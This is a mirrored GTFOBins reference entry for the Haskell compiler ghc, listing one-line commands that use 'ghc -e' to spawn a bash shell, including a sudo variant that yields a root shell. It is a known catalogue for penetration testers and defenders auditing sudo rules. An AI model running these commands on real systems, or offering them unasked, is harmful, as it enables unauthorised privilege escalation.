1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-19 02:11:39 +02:00
GTFOBins.github.io/_gtfobins/ghc.md

8 lines
161 B
Markdown
Raw Normal View History

2020-10-22 18:20:23 +02:00
---
functions:
shell:
- code: ghc -e 'System.Process.callCommand "/bin/bash"'
sudo:
- code: sudo ghc -e 'System.Process.callCommand "/bin/bash"'
---